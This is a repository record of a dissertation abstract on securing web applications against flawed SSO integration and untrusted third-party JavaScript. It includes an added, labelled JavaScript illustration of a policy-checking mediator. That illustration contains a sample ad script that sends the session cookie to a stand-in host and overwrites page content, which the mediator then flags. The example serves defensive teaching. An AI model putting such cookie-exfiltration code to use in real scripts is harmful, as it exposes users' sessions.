Improving Security and Privacy of Integrated Web Applications
Zhou, Yuchen, Computer Engineering - School of Engineering and Applied Science, University of Virginia
Evans, David, Department of Computer Science, University of Virginia
Modern applications integrate third-party services for easier development, additional functionality (e.g., connecting with social network identities), and extra revenue (e.g., advertising networks). This integration, however, presents risks to application integrity and user privacy. This research addresses integrated applications that incorporate two types of third-party services: (1) services from trusted providers that supply security-critical functionality to an application, such as Single Sign-On (SSO), and (2) services from untrusted providers that supply other functionality, such as analytics and advertisements. Unlike traditional library inclusions, integrated applications present new challenges because third-party back-end services and platform runtimes are opaque to the application developer.
For the first type of integration, we assume a benign service provider, and our goal is to eliminate misunderstandings between the service provider and the application developer that may lead to security vulnerabilities in the implementation. We advocate a systematic approach for discovering implicit assumptions, using an iterative process to refine system models and uncover the assumptions the implementation needs. To understand the prevalence of the discovered vulnerabilities at large scale, we developed an automated vulnerability scanner, SSOScan, that can be deployed in an application marketplace or as a stand-alone service. This testing framework drives the application automatically and checks whether a given application is vulnerable by carrying out simulated attacks and monitoring application traffic and behavior; we have used it to automatically find serious vulnerabilities in hundreds of websites.
For the second type of integration, the embedding application does not rely on a third-party service for security-critical functionality, but wants to prevent harm to the application and its users from embedded services that may be malicious. Integrated services often execute as the same principal as the host application code, with full access to application and user data. To mitigate the risks of integrating untrusted code, our approach aims to prevent third-party services from exfiltrating sensitive data or maliciously tampering with the host content. To this end, we first developed a modified Chromium browser that supports fine-grained DOM access control as well as JavaScript execution context isolation. We built an automatic policy generator that identifies private information by comparing duplicate requests. To reduce false positives and further improve site administrators' understanding of third-party JavaScript behavior, we built ScriptInspector, a modification of Firefox that mediates, records, and visualizes critical resource accesses. ScriptInspector can be used to compare runtime accesses with existing policies and report violations to site administrators. To facilitate policy creation, the PolicyGenerator extension proposes permission candidates for site administrators to inspect, edit, and approve.
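The mediate, record, compare-with-policy, and report loop described above, as an added illustration in JavaScript that is not ScriptInspector's or PolicyGenerator's code: the host page object, the resource naming scheme (`dom:read:<property>`, `dom:write:<property>`, `net:send:<host>`), the allow-list policy format, and the two embedded scripts are all constructed for this example. A real mediator is built into the browser and sees DOM, cookie and network accesses directly; here a Proxy over a plain object stands in for it.

```javascript
// Added example (not code from the dissertation). Toy version of the
// mediate / record / compare / report loop for embedded third-party scripts.
// Resource names, policy format and the host object are assumptions.

// Constructed host page state that embedded scripts can reach.
function makeHost(sent) {
  return {
    cookie: "session=abc123",               // sensitive: identifies the user
    content: "<p>Welcome back, Alice</p>",  // host content third parties must not tamper with
    title: "Example page",
    send(destination, payload) {            // stands in for an outbound request
      sent.push({ destination, payload });
      return true;
    },
  };
}

// Mediation layer: every property read, property write and outbound send that
// a named script performs on the host object is recorded in `log`.
function mediate(host, scriptName, log) {
  return new Proxy(host, {
    get(target, prop) {
      if (prop === "send") {
        return (destination, payload) => {
          log.push({ script: scriptName, access: "net:send:" + new URL(destination).host });
          return target.send(destination, payload);
        };
      }
      log.push({ script: scriptName, access: "dom:read:" + String(prop) });
      return target[prop];
    },
    set(target, prop, value) {
      log.push({ script: scriptName, access: "dom:write:" + String(prop) });
      target[prop] = value;
      return true;
    },
  });
}

// Compare recorded accesses with a per-script allow-list and return the violations.
function checkPolicy(log, policy) {
  const violations = [];
  for (const entry of log) {
    const allowed = policy[entry.script] || [];
    if (!allowed.includes(entry.access)) violations.push(entry);
  }
  return violations;
}

// Propose permission candidates from a recorded run: one sorted,
// de-duplicated list per script, for an administrator to inspect and edit.
function proposePolicy(log) {
  const seen = {};
  for (const { script, access } of log) {
    if (!seen[script]) seen[script] = new Set();
    seen[script].add(access);
  }
  const proposal = {};
  for (const script of Object.keys(seen)) proposal[script] = [...seen[script]].sort();
  return proposal;
}

// Constructed run: an analytics script that stays within its policy, and an
// ad script that reads the session cookie and overwrites host content.
function runExample() {
  const log = [];
  const sent = [];
  const host = makeHost(sent);

  const analytics = mediate(host, "analytics.js", log);
  analytics.send("https://analytics.example/collect", { title: analytics.title });

  const ad = mediate(host, "ad.js", log);
  ad.send("https://ads.example/beacon", { c: ad.cookie }); // exfiltration attempt
  ad.content = "<p>BUY NOW</p>";                           // tampering attempt

  const policy = {
    "analytics.js": ["dom:read:title", "net:send:analytics.example"],
    "ad.js": ["net:send:ads.example"],
  };
  return { violations: checkPolicy(log, policy), proposal: proposePolicy(log), sent };
}

if (typeof require !== "undefined" && require.main === module) {
  console.log(JSON.stringify(runExample(), null, 2));
}
if (typeof module !== "undefined") {
  module.exports = { makeHost, mediate, checkPolicy, proposePolicy, runExample };
}
```

Running the example reports two violations, both by `ad.js` (`dom:read:cookie` and `dom:write:content`), while the proposal for `ad.js` lists all three accesses it made, which is exactly the list an administrator would prune before approving it as policy. Note that the mediator records the cookie read before the send that carries it; a deployed tool would additionally need to tie the two together to show that the read fed an exfiltration.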
The nature of modern web application development presents major challenges for security. Although developers are prone to making mistakes when integrating third-party components, the systematic analysis approach, automatic scanners, and developer tools we present can significantly increase a developer's confidence in the security and privacy of integrated applications.
PHD (Doctor of Philosophy)
Web Application Security, Third-party Service Security
English
All rights reserved (no additional license for public reuse)
2015/04/15